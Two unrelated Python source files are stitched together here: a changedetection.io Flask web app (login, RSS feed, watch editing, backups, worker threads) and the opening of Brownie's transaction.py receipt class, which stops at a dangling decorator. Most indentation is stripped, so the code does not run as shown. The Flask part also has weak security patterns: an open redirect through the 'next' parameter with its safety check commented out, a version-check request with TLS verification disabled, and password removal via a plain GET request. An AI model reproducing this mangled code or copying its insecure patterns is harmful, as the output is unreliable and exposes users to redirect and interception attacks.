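# Usage note (illustrative): the secret is generated once and persisted to
# "<datastore_path>/secret.txt", so Flask sessions survive restarts; deleting that file
# forces a new secret on the next start and invalidates existing login sessions.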
# Remember: Python passes objects by reference, so the form is modified in place.
# populate_form in wtforms didn't work for me. (try using a setattr() obj type on datastore.watch?)
def populate_form_from_watch(form, watch):
for i in form.__dict__.keys():
if i[0] != '_':
p = getattr(form, i)
if hasattr(p, 'data') and i in watch:
setattr(p, "data", watch[i])
# We use the whole watch object from the store/JSON so we can see if there's some related status in terms of a thread
# running or something similar.
@app.template_filter('format_last_checked_time')
def _jinja2_filter_datetime(watch_obj, format="%Y-%m-%d %H:%M:%S"):
# Worker thread tells us which UUID it is currently processing.
for t in running_update_threads:
if t.current_uuid == watch_obj['uuid']:
return "Checking now.."
if watch_obj['last_checked'] == 0:
return 'Not yet'
return timeago.format(int(watch_obj['last_checked']), time.time())
# @app.context_processor
# def timeago():
# def _timeago(lower_time, now):
# return timeago.format(lower_time, now)
# return dict(timeago=_timeago)
@app.template_filter('format_timestamp_timeago')
def _jinja2_filter_datetimestamp(timestamp, format="%Y-%m-%d %H:%M:%S"):
return timeago.format(timestamp, time.time())
# return timeago.format(timestamp, time.time())
# return datetime.datetime.utcfromtimestamp(timestamp).strftime(format)
class User(flask_login.UserMixin):
id=None
def set_password(self, password):
return True
def get_user(self, email="defaultuser@changedetection.io"):
return self
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return str(self.id)
def check_password(self, password):
import hashlib
import base64
# Getting the values back out
raw_salt_pass = base64.b64decode(datastore.data['settings']['application']['password'])
salt_from_storage = raw_salt_pass[:32] # 32 is the length of the salt
# Use the exact same setup you used to generate the key, but this time put in the password to check
new_key = hashlib.pbkdf2_hmac(
'sha256',
password.encode('utf-8'), # Convert the password to bytes
salt_from_storage,
100000
)
new_key = salt_from_storage + new_key
return new_key == raw_salt_pass
pass
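# Hedged sketch (not part of the app, helper name is hypothetical): how a stored password
# value compatible with User.check_password above could be produced - a random 32-byte salt,
# PBKDF2-HMAC-SHA256 with 100000 iterations, then base64 of salt + derived key.
def _example_hash_password(password):
    import base64
    import hashlib
    import secrets
    salt = secrets.token_bytes(32)  # check_password reads the first 32 bytes back as the salt
    key = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, 100000)
    return base64.b64encode(salt + key).decode('ascii')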
def changedetection_app(config=None, datastore_o=None):
global datastore
datastore = datastore_o
#app.config.update(config or {})
login_manager = flask_login.LoginManager(app)
login_manager.login_view = 'login'
app.secret_key = init_app_secret(config['datastore_path'])
# Setup cors headers to allow all domains
# https://flask-cors.readthedocs.io/en/latest/
# CORS(app)
@login_manager.user_loader
def user_loader(email):
user = User()
user.get_user(email)
return user
@login_manager.unauthorized_handler
def unauthorized_handler():
# @todo validate its a URL of this host and use that
return redirect(url_for('login', next=url_for('index')))
@app.route('/logout')
def logout():
flask_login.logout_user()
return redirect(url_for('index'))
# https://github.com/pallets/flask/blob/93dd1709d05a1cf0e886df6223377bdab3b077fb/examples/tutorial/flaskr/__init__.py#L39
# You can divide up the stuff like this
@app.route('/login', methods=['GET', 'POST'])
def login():
if not datastore.data['settings']['application']['password']:
flash("Login not required, no password enabled.", "notice")
return redirect(url_for('index'))
if request.method == 'GET':
output = render_template("login.html")
return output
user = User()
user.id = "defaultuser@changedetection.io"
password = request.form.get('password')
if (user.check_password(password)):
flask_login.login_user(user, remember=True)
next = request.args.get('next')
# if not is_safe_url(next):
# return flask.abort(400)
return redirect(next or url_for('index'))
else:
flash('Incorrect password', 'error')
return redirect(url_for('login'))
@app.before_request
def do_something_whenever_a_request_comes_in():
# Disable password login if no password is set
app.config['LOGIN_DISABLED'] = datastore.data['settings']['application']['password'] == False
# For the RSS path, allow access via a token
if request.path == '/rss' and request.args.get('token'):
app_rss_token = datastore.data['settings']['application']['rss_access_token']
rss_url_token = request.args.get('token')
if app_rss_token == rss_url_token:
app.config['LOGIN_DISABLED'] = True
@app.route("/rss", methods=['GET'])
@login_required
def rss():
limit_tag = request.args.get('tag')
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
# @todo needs a .itemsWithTag() or something
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
fg = FeedGenerator()
fg.title('changedetection.io')
fg.description('Feed description')
fg.link(href='https://changedetection.io')
for watch in sorted_watches:
if not watch['viewed']:
# Re #239 - GUID needs to be individual for each event
# @todo In the future make this a configurable link back (see work on BASE_URL https://github.com/dgtlmoon/changedetection.io/pull/228)
guid = "{}/{}".format(watch['uuid'], watch['last_changed'])
fe = fg.add_entry()
# Include a link to the diff page, they will have to login here to see if password protection is enabled.
# Description is the page you watch, link takes you to the diff JS UI page
base_url = datastore.data['settings']['application']['base_url']
if base_url == '':
base_url = "<base-url-env-var-not-set>"
diff_link = {'href': "{}{}".format(base_url, url_for('diff_history_page', uuid=watch['uuid']))}
# @todo use title if it exists
fe.link(link=diff_link)
fe.title(title=watch['url'])
# @todo in the future <description><![CDATA[<html><body>Any code html is valid.</body></html>]]></description>
fe.description(description=watch['url'])
fe.guid(guid, permalink=False)
dt = datetime.datetime.fromtimestamp(int(watch['newest_history_key']))
dt = dt.replace(tzinfo=pytz.UTC)
fe.pubDate(dt)
response = make_response(fg.rss_str())
response.headers.set('Content-Type', 'application/rss+xml')
return response
@app.route("/", methods=['GET'])
@login_required
def index():
limit_tag = request.args.get('tag')
pause_uuid = request.args.get('pause')
# Redirect for the old rss path which used the /?rss=true
if request.args.get('rss'):
return redirect(url_for('rss', tag=limit_tag))
if pause_uuid:
try:
datastore.data['watching'][pause_uuid]['paused'] ^= True
datastore.needs_write = True
return redirect(url_for('index', tag = limit_tag))
except KeyError:
pass
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
existing_tags = datastore.get_all_tags()
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
output = render_template("watch-overview.html",
form=form,
watches=sorted_watches,
tags=existing_tags,
active_tag=limit_tag,
app_rss_token=datastore.data['settings']['application']['rss_access_token'],
has_unviewed=datastore.data['has_unviewed'])
return output
@app.route("/scrub", methods=['GET', 'POST'])
@login_required
def scrub_page():
import re
if request.method == 'POST':
confirmtext = request.form.get('confirmtext')
limit_date = request.form.get('limit_date')
limit_timestamp = 0
# Re #149 - allow empty/0 timestamp limit
if len(limit_date):
try:
limit_date = limit_date.replace('T', ' ')
# I noticed chrome will show '/' but actually submit '-'
limit_date = limit_date.replace('-', '/')
# In the case that :ss seconds are supplied
limit_date = re.sub(r'(\d\d:\d\d)(:\d\d)', '\\1', limit_date)
str_to_dt = datetime.datetime.strptime(limit_date, '%Y/%m/%d %H:%M')
limit_timestamp = int(str_to_dt.timestamp())
if limit_timestamp > time.time():
flash("Timestamp is in the future, cannot continue.", 'error')
return redirect(url_for('scrub_page'))
except ValueError:
flash('Incorrect date format, cannot continue.', 'error')
return redirect(url_for('scrub_page'))
if confirmtext == 'scrub':
changes_removed = 0
for uuid, watch in datastore.data['watching'].items():
if limit_timestamp:
changes_removed += datastore.scrub_watch(uuid, limit_timestamp=limit_timestamp)
else:
changes_removed += datastore.scrub_watch(uuid)
flash("Cleared snapshot history ({} snapshots removed)".format(changes_removed))
else:
flash('Incorrect confirmation text.', 'error')
return redirect(url_for('index'))
output = render_template("scrub.html")
return output
# If they edited an existing watch, we may need to reset the current/previous md5 so that
# the excluded text is taken into account.
def get_current_checksum_include_ignore_text(uuid):
import hashlib
from changedetectionio import fetch_site_status
# Get the most recent one
newest_history_key = datastore.get_val(uuid, 'newest_history_key')
# 0 means there's only one entry, so there should be no 'unviewed' history available
if newest_history_key == 0:
newest_history_key = list(datastore.data['watching'][uuid]['history'].keys())[0]
if newest_history_key:
with open(datastore.data['watching'][uuid]['history'][newest_history_key],
encoding='utf-8') as file:
raw_content = file.read()
handler = fetch_site_status.perform_site_check(datastore=datastore)
stripped_content = handler.strip_ignore_text(raw_content,
datastore.data['watching'][uuid]['ignore_text'])
checksum = hashlib.md5(stripped_content).hexdigest()
return checksum
return datastore.data['watching'][uuid]['previous_md5']
@app.route("/edit/<string:uuid>", methods=['GET', 'POST'])
@login_required
def edit_page(uuid):
from changedetectionio import forms
form = forms.watchForm(request.form)
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
if request.method == 'GET':
if not uuid in datastore.data['watching']:
flash("No watch with the UUID %s found." % (uuid), "error")
return redirect(url_for('index'))
populate_form_from_watch(form, datastore.data['watching'][uuid])
if datastore.data['watching'][uuid]['fetch_backend'] is None:
form.fetch_backend.data = datastore.data['settings']['application']['fetch_backend']
if request.method == 'POST' and form.validate():
# Re #110, if they submit the same as the default value, set it to None, so we continue to follow the default
if form.minutes_between_check.data == datastore.data['settings']['requests']['minutes_between_check']:
form.minutes_between_check.data = None
if form.fetch_backend.data == datastore.data['settings']['application']['fetch_backend']:
form.fetch_backend.data = None
update_obj = {'url': form.url.data.strip(),
'minutes_between_check': form.minutes_between_check.data,
'tag': form.tag.data.strip(),
'title': form.title.data.strip(),
'headers': form.headers.data,
'body': form.body.data,
'method': form.method.data,
'fetch_backend': form.fetch_backend.data,
'trigger_text': form.trigger_text.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
'extract_title_as_title': form.extract_title_as_title.data
}
# Notification URLs
datastore.data['watching'][uuid]['notification_urls'] = form.notification_urls.data
# Ignore text
form_ignore_text = form.ignore_text.data
datastore.data['watching'][uuid]['ignore_text'] = form_ignore_text
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form_ignore_text:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
# Reset the previous_md5 so we process a new snapshot when the CSS filter changes.
# Compare against the stored value before overwriting it, otherwise the change is never detected.
if form.css_filter.data.strip() != datastore.data['watching'][uuid]['css_filter']:
    if len(datastore.data['watching'][uuid]['history']):
        update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
datastore.data['watching'][uuid]['css_filter'] = form.css_filter.data.strip()
datastore.data['watching'][uuid].update(update_obj)
flash("Updated watch.")
# Re #286 - We wait for syncing new data to disk in another thread every 60 seconds
# But in the case something is added we should save straight away
datastore.sync_to_json()
# Queue the watch for immediate recheck
update_q.put(uuid)
if form.trigger_check.data:
if len(form.notification_urls.data):
n_object = {'watch_url': form.url.data.strip(),
'notification_urls': form.notification_urls.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
}
notification_q.put(n_object)
flash('Test notification queued.')
else:
flash('No notification URLs set, cannot send test.', 'error')
# Diff page [edit] link should go back to diff page
if request.args.get("next") and request.args.get("next") == 'diff':
return redirect(url_for('diff_history_page', uuid=uuid))
else:
return redirect(url_for('index'))
else:
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
# Re #110 offer the default minutes
using_default_minutes = False
if form.minutes_between_check.data == None:
form.minutes_between_check.data = datastore.data['settings']['requests']['minutes_between_check']
using_default_minutes = True
output = render_template("edit.html",
uuid=uuid,
watch=datastore.data['watching'][uuid],
form=form,
using_default_minutes=using_default_minutes,
current_base_url = datastore.data['settings']['application']['base_url']
)
return output
@app.route("/settings", methods=['GET', "POST"])
@login_required
def settings_page():
from changedetectionio import forms
from changedetectionio import content_fetcher
form = forms.globalSettingsForm(request.form)
if request.method == 'GET':
form.minutes_between_check.data = int(datastore.data['settings']['requests']['minutes_between_check'])
form.notification_urls.data = datastore.data['settings']['application']['notification_urls']
form.global_ignore_text.data = datastore.data['settings']['application']['global_ignore_text']
form.extract_title_as_title.data = datastore.data['settings']['application']['extract_title_as_title']
form.fetch_backend.data = datastore.data['settings']['application']['fetch_backend']
form.notification_title.data = datastore.data['settings']['application']['notification_title']
form.notification_body.data = datastore.data['settings']['application']['notification_body']
form.notification_format.data = datastore.data['settings']['application']['notification_format']
form.base_url.data = datastore.data['settings']['application']['base_url']
# Password unset is a GET
if request.values.get('removepassword') == 'yes':
from pathlib import Path
datastore.data['settings']['application']['password'] = False
flash("Password protection removed.", 'notice')
flask_login.logout_user()
return redirect(url_for('settings_page'))
if request.method == 'POST' and form.validate():
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['requests']['minutes_between_check'] = form.minutes_between_check.data
datastore.data['settings']['application']['extract_title_as_title'] = form.extract_title_as_title.data
datastore.data['settings']['application']['fetch_backend'] = form.fetch_backend.data
datastore.data['settings']['application']['notification_title'] = form.notification_title.data
datastore.data['settings']['application']['notification_body'] = form.notification_body.data
datastore.data['settings']['application']['notification_format'] = form.notification_format.data
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['application']['base_url'] = form.base_url.data
datastore.data['settings']['application']['global_ignore_text'] = form.global_ignore_text.data
if form.trigger_check.data:
if len(form.notification_urls.data):
n_object = {'watch_url': "Test from changedetection.io!",
'notification_urls': form.notification_urls.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
}
notification_q.put(n_object)
flash('Test notification queued.')
else:
flash('No notification URLs set, cannot send test.', 'error')
if form.password.encrypted_password:
datastore.data['settings']['application']['password'] = form.password.encrypted_password
flash("Password protection enabled.", 'notice')
flask_login.logout_user()
return redirect(url_for('index'))
datastore.needs_write = True
flash("Settings updated.")
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
output = render_template("settings.html", form=form, current_base_url = datastore.data['settings']['application']['base_url'])
return output
@app.route("/import", methods=['GET', "POST"])
@login_required
def import_page():
import validators
remaining_urls = []
good = 0
if request.method == 'POST':
urls = request.values.get('urls').split("\n")
for url in urls:
url = url.strip()
if len(url) and validators.url(url):
new_uuid = datastore.add_watch(url=url.strip(), tag="")
# Straight into the queue.
update_q.put(new_uuid)
good += 1
else:
if len(url):
remaining_urls.append(url)
flash("{} Imported, {} Skipped.".format(good, len(remaining_urls)))
if len(remaining_urls) == 0:
# Looking good, redirect to index.
return redirect(url_for('index'))
# Could be some remaining, or we could be on GET
output = render_template("import.html",
remaining="\n".join(remaining_urls)
)
return output
# Clear all statuses, so we do not see the 'unviewed' class
@app.route("/api/mark-all-viewed", methods=['GET'])
@login_required
def mark_all_viewed():
# Save the current newest history as the most recently viewed
for watch_uuid, watch in datastore.data['watching'].items():
datastore.set_last_viewed(watch_uuid, watch['newest_history_key'])
flash("Cleared all statuses.")
return redirect(url_for('index'))
@app.route("/diff/<string:uuid>", methods=['GET'])
@login_required
def diff_history_page(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
dates = list(watch['history'].keys())
# Convert to int, sort and back to str again
# @todo replace datastore getter that does this automatically
dates = [int(i) for i in dates]
dates.sort(reverse=True)
dates = [str(i) for i in dates]
if len(dates) < 2:
flash("Not enough saved change detection snapshots to produce a report.", "error")
return redirect(url_for('index'))
# Save the current newest history as the most recently viewed
datastore.set_last_viewed(uuid, dates[0])
newest_file = watch['history'][dates[0]]
with open(newest_file, 'r') as f:
newest_version_file_contents = f.read()
previous_version = request.args.get('previous_version')
try:
previous_file = watch['history'][previous_version]
except KeyError:
# Not present, use a default value, the second one in the sorted list.
previous_file = watch['history'][dates[1]]
with open(previous_file, 'r') as f:
previous_version_file_contents = f.read()
output = render_template("diff.html", watch_a=watch,
newest=newest_version_file_contents,
previous=previous_version_file_contents,
extra_stylesheets=extra_stylesheets,
versions=dates[1:],
uuid=uuid,
newest_version_timestamp=dates[0],
current_previous_version=str(previous_version),
current_diff_url=watch['url'],
extra_title=" - Diff - {}".format(watch['title'] if watch['title'] else watch['url']),
left_sticky= True )
return output
@app.route("/preview/<string:uuid>", methods=['GET'])
@login_required
def preview_page(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
newest = list(watch['history'].keys())[-1]
with open(watch['history'][newest], 'r') as f:
content = f.readlines()
output = render_template("preview.html",
content=content,
extra_stylesheets=extra_stylesheets,
current_diff_url=watch['url'],
uuid=uuid)
return output
@app.route("/favicon.ico", methods=['GET'])
def favicon():
return send_from_directory("static/images", path="favicon.ico")
# We're good but backups are even better!
@app.route("/backup", methods=['GET'])
@login_required
def get_backup():
import zipfile
from pathlib import Path
# Remove any existing backup file, for now we just keep one file
for previous_backup_filename in Path(app.config['datastore_path']).rglob('changedetection-backup-*.zip'):
os.unlink(previous_backup_filename)
# create a ZipFile object
backupname = "changedetection-backup-{}.zip".format(int(time.time()))
# We only care about UUIDS from the current index file
uuids = list(datastore.data['watching'].keys())
backup_filepath = os.path.join(app.config['datastore_path'], backupname)
with zipfile.ZipFile(backup_filepath, "w",
compression=zipfile.ZIP_DEFLATED,
compresslevel=8) as zipObj:
# Make sure the latest data has been written to disk first
datastore.sync_to_json()
# Add the index
zipObj.write(os.path.join(app.config['datastore_path'], "url-watches.json"), arcname="url-watches.json")
# Add the flask app secret
zipObj.write(os.path.join(app.config['datastore_path'], "secret.txt"), arcname="secret.txt")
# Add any snapshot data we find, use the full path to access the file, but make the file 'relative' in the Zip.
for txt_file_path in Path(app.config['datastore_path']).rglob('*.txt'):
parent_p = txt_file_path.parent
if parent_p.name in uuids:
zipObj.write(txt_file_path,
arcname=str(txt_file_path).replace(app.config['datastore_path'], ''),
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
# Create a list file with just the URLs, so it's easier to port somewhere else in the future
list_file = os.path.join(app.config['datastore_path'], "url-list.txt")
with open(list_file, "w") as f:
for uuid in datastore.data['watching']:
url = datastore.data['watching'][uuid]['url']
f.write("{}\r\n".format(url))
# Add it to the Zip
zipObj.write(list_file,
arcname="url-list.txt",
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
return send_from_directory(app.config['datastore_path'], backupname, as_attachment=True)
@app.route("/static/<string:group>/<string:filename>", methods=['GET'])
def static_content(group, filename):
# These files should be in our subdirectory
try:
return send_from_directory("static/{}".format(group), path=filename)
except FileNotFoundError:
abort(404)
@app.route("/api/add", methods=['POST'])
@login_required
def api_watch_add():
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
if form.validate():
url = request.form.get('url').strip()
if datastore.url_exists(url):
flash('The URL {} already exists'.format(url), "error")
return redirect(url_for('index'))
# @todo add_watch should throw a custom Exception for validation etc
new_uuid = datastore.add_watch(url=url, tag=request.form.get('tag').strip())
# Straight into the queue.
update_q.put(new_uuid)
flash("Watch added.")
return redirect(url_for('index'))
else:
flash("Error")
return redirect(url_for('index'))
@app.route("/api/delete", methods=['GET'])
@login_required
def api_delete():
uuid = request.args.get('uuid')
datastore.delete(uuid)
flash('Deleted.')
return redirect(url_for('index'))
@app.route("/api/clone", methods=['GET'])
@login_required
def api_clone():
uuid = request.args.get('uuid')
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
new_uuid = datastore.clone(uuid)
update_q.put(new_uuid)
flash('Cloned.')
return redirect(url_for('index'))
@app.route("/api/checknow", methods=['GET'])
@login_required
def api_watch_checknow():
tag = request.args.get('tag')
uuid = request.args.get('uuid')
i = 0
running_uuids = []
for t in running_update_threads:
running_uuids.append(t.current_uuid)
# @todo check thread is running and skip
if uuid:
if uuid not in running_uuids:
update_q.put(uuid)
i = 1
elif tag != None:
# Items that have this current tag
for watch_uuid, watch in datastore.data['watching'].items():
if (tag != None and tag in watch['tag']):
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
else:
# No tag, no uuid, add everything.
for watch_uuid, watch in datastore.data['watching'].items():
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
flash("{} watches are rechecking.".format(i))
return redirect(url_for('index', tag=tag))
# @todo handle ctrl break
ticker_thread = threading.Thread(target=ticker_thread_check_time_launch_checks).start()
threading.Thread(target=notification_runner).start()
# Check for new release version, but not when running in test/build
if not os.getenv("GITHUB_REF", False):
threading.Thread(target=check_for_new_version).start()
return app
# Check for new version and anonymous stats
def check_for_new_version():
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
while not app.config.exit.is_set():
try:
r = requests.post("https://changedetection.io/check-ver.php",
data={'version': __version__,
'app_guid': datastore.data['app_guid'],
'watch_count': len(datastore.data['watching'])
},
verify=False)
except:
pass
try:
if "new_version" in r.text:
app.config['NEW_VERSION_AVAILABLE'] = True
except:
pass
# Check daily
app.config.exit.wait(86400)
def notification_runner():
while not app.config.exit.is_set():
try:
# At the moment only one thread runs (single runner)
n_object = notification_q.get(block=False)
except queue.Empty:
time.sleep(1)
else:
# Process notifications
try:
from changedetectionio import notification
notification.process_notification(n_object, datastore)
except Exception as e:
print("Watch URL: {} Error {}".format(n_object['watch_url'], e))
# Thread runner that periodically checks which watches are due and feeds them into the queue.
def ticker_thread_check_time_launch_checks():
from changedetectionio import update_worker
# Spin up Workers.
for _ in range(datastore.data['settings']['requests']['workers']):
new_worker = update_worker.update_worker(update_q, notification_q, app, datastore)
running_update_threads.append(new_worker)
new_worker.start()
while not app.config.exit.is_set():
# Get a list of watches by UUID that are currently fetching data
running_uuids = []
for t in running_update_threads:
if t.current_uuid:
running_uuids.append(t.current_uuid)
# Re #232 - Deepcopy the data in case it changes while we're iterating through it all
copied_datastore = deepcopy(datastore)
# Check for watches outside of the time threshold to put in the thread queue.
for uuid, watch in copied_datastore.data['watching'].items():
# If they supplied an individual entry minutes to threshold.
if 'minutes_between_check' in watch and watch['minutes_between_check'] is not None:
# Cast to int just in case
max_time = int(watch['minutes_between_check']) * 60
else:
# Default system wide.
max_time = int(copied_datastore.data['settings']['requests']['minutes_between_check']) * 60
threshold = time.time() - max_time
# Yeah, put it in the queue, it's more than time.
if not watch['paused'] and watch['last_checked'] <= threshold:
if not uuid in running_uuids and uuid not in update_q.queue:
update_q.put(uuid)
# Wait a few seconds before checking the list again
time.sleep(3)
# Should be low so we can break this out in testing
app.config.exit.wait(1)
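# Hedged, self-contained sketch (not used by the app) of the recheck rule applied in the loop
# above: a watch is due when last_checked is at least minutes_between_check * 60 seconds old.
def _example_watch_is_due(last_checked, minutes_between_check, now):
    # e.g. _example_watch_is_due(0, 5, 301) -> True, _example_watch_is_due(0, 5, 299) -> False
    return last_checked <= now - minutes_between_check * 60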
|
transaction.py
|
#!/usr/bin/python3
import functools
import sys
import threading
import time
from enum import IntEnum
from hashlib import sha1
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
import black
import requests
from eth_abi import decode_abi
from hexbytes import HexBytes
from web3.exceptions import TimeExhausted, TransactionNotFound
from brownie._config import CONFIG
from brownie.convert import EthAddress, Wei
from brownie.exceptions import ContractNotFound, RPCRequestError
from brownie.project import build
from brownie.project import main as project_main
from brownie.project.compiler.solidity import SOLIDITY_ERROR_CODES
from brownie.project.sources import highlight_source
from brownie.test import coverage
from brownie.utils import color
from brownie.utils.output import build_tree
from . import state
from .event import EventDict, _decode_logs, _decode_trace
from .web3 import web3
def trace_property(fn: Callable) -> Any:
# attributes that are only available after querying the transaction trace
@property # type: ignore
def wrapper(self: "TransactionReceipt") -> Any:
if self.status < 0:
return None
if self._trace_exc is not None:
raise self._trace_exc
try:
return fn(self)
except RPCRequestError as exc:
if web3.supports_traces:
# if the node client supports traces, raise the actual error
raise exc
raise RPCRequestError(
f"Accessing `TransactionReceipt.{fn.__name__}` on a {self.status.name.lower()} "
"transaction requires the `debug_traceTransaction` RPC endpoint, but the node "
"client does not support it or has not made it available."
) from None
return wrapper
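# e.g. accessing `tx.events` while the tx is still pending (status < 0) simply returns None,
# and on a node without `debug_traceTransaction` the wrapped access raises the RPCRequestError above.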
def trace_inspection(fn: Callable) -> Any:
def wrapper(self: "TransactionReceipt", *args: Any, **kwargs: Any) -> Any:
if self.contract_address:
raise NotImplementedError(
"Trace inspection methods are not available for deployment transactions."
)
if self.input == "0x" and self.gas_used == 21000:
return None
return fn(self, *args, **kwargs)
functools.update_wrapper(wrapper, fn)
return wrapper
class Status(IntEnum):
Dropped = -2
Pending = -1
Reverted = 0
Confirmed = 1
class TransactionReceipt:
"""Attributes and methods relating to a broadcasted transaction.
* All ether values are given as integers denominated in wei.
* Before the tx has confirmed, most attributes are set to None
* Accessing methods / attributes that query debug_traceTransaction
may be very slow if the transaction involved many steps
Attributes:
contract_name: Name of the contract called in the transaction
fn_name: Name of the method called in the transaction
txid: Transaction ID
sender: Address of the sender
receiver: Address of the receiver
value: Amount transferred
gas_price: Gas price
gas_limit: Gas limit
gas_used: Gas used
input: Hexstring input data
confirmations: The number of blocks since the transaction was confirmed
nonce: Transaction nonce
block_number: Block number this transaction was included in
timestamp: Timestamp of the block this transaction was included in
txindex: Index of the transaction within the mined block
contract_address: Address of contract deployed by the transaction
logs: Raw transaction logs
status: Transaction status: -2 dropped, -1 pending, 0 reverted, 1 successful
Additional attributes:
(only available if debug_traceTransaction is enabled in the RPC)
events: Decoded transaction log events
trace: Expanded stack trace from debug_traceTransaction
return_value: Return value(s) from contract call
revert_msg: Error string from the reverted contract call
modified_state: Boolean, did this contract write to storage?"""
# these are defined as class attributes to expose them in console completion hints
block_number = None
contract_address: Optional[str] = None
contract_name = None
fn_name = None
gas_used = None
logs: Optional[List] = None
nonce = None
sender = None
txid: str
txindex = None
def __init__(
self,
txid: Union[str, bytes],
sender: Any = None,
silent: bool = True,
required_confs: int = 1,
is_blocking: bool = True,
name: str = "",
revert_data: Optional[Tuple] = None,
) -> None:
"""Instantiates a new TransactionReceipt object.
Args:
txid: hexstring transaction ID
sender: sender as a hex string or Account object
required_confs: the number of required confirmations before processing the receipt
is_blocking: if True, creating the object is a blocking action until the required
confirmations are received
silent: toggles console verbosity (default True)
name: contract function being called
revert_data: (revert string, program counter, revert type)
"""
self._silent = silent
if isinstance(txid, bytes):
txid = HexBytes(txid).hex()
if not self._silent:
print(f"\rTransaction sent: {color('bright blue')}{txid}{color}")
# this event is set once the transaction is confirmed or dropped
# it is used to wait during blocking transaction actions
self._confirmed = threading.Event()
# internal attributes
self._call_cost = 0
self._trace_exc: Optional[Exception] = None
self._trace_origin: Optional[str] = None
self._raw_trace: Optional[List] = None
self._trace: Optional[List] = None
self._events: Optional[EventDict] = None
self._return_value: Any = None
self._revert_msg: Optional[str] = None
self._dev_revert_msg: Optional[str] = None
self._modified_state: Optional[bool] = None
self._new_contracts: Optional[List] = None
self._internal_transfers: Optional[List[Dict]] = None
self._subcalls: Optional[List[Dict]] = None
# attributes that can be set immediately
self.sender = sender
self.status = Status(-1)
self.txid = str(txid)
self.contract_name = None
self.fn_name = name
if name and "." in name:
self.contract_name, self.fn_name = name.split(".", maxsplit=1)
# avoid querying the trace to get the revert string if possible
self._revert_msg, self._revert_pc, revert_type = revert_data or (None, None, None)
if self._revert_msg is None and revert_type not in ("revert", "invalid_opcode"):
self._revert_msg = revert_type
if self._revert_pc is not None:
self._dev_revert_msg = build._get_dev_revert(self._revert_pc) or None
self._await_transaction(required_confs, is_blocking)
def __repr__(self) -> str:
color_str = {-2: "dark white", -1: "bright yellow", 0: "bright red", 1: ""}[self.status]
return f"<Transaction '{color(color_str)}{self.txid}{color}'>"
def __hash__(self) -> int:
return hash(self.txid)
@trace_property
def events(self) -> Optional[EventDict]:
if self._events is None:
if self.status:
# relay contract map so we can decode ds-note logs
addrs = {log.address for log in self.logs} if self.logs else set()
contracts = {addr: state._find_contract(addr) for addr in addrs}
self._events = _decode_logs(self.logs, contracts=contracts) # type: ignore
else:
self._get_trace()
# get events from the trace - handled lazily so that other
# trace operations are not blocked in case of a decoding error
initial_address = str(self.receiver or self.contract_address)
self._events = _decode_trace(self._raw_trace, initial_address) # type: ignore
return self._events
@trace_property
def internal_transfers(self) -> Optional[List]:
if not self.status:
return []
if self._internal_transfers is None:
self._expand_trace()
return self._internal_transfers
@trace_property
def modified_state(self) -> Optional[bool]:
if not self.status:
self._modified_state = False
elif self._modified_state is None:
self._get_trace()
return self._modified_state
@trace_property
def new_contracts(self) -> Optional[List]:
if not self.status:
return []
if self._new_contracts is None:
self._expand_trace()
return self._new_contracts
@trace_property
def return_value(self) -> Optional[str]:
if not self.status:
return None
if self._return_value is None:
self._get_trace()
return self._return_value
@trace_property
def revert_msg(self) -> Optional[str]:
if self.status:
return None
if self._revert_msg is None:
self._get_trace()
elif self.contract_address and self._revert_msg == "out of gas":
self._get_trace()
return self._revert_msg
@trace_property
def dev_revert_msg(self) -> Optional[str]:
if self.status:
return None
if self._dev_revert_msg is None:
self._get_trace()
return self._dev_revert_msg or None
@trace_property
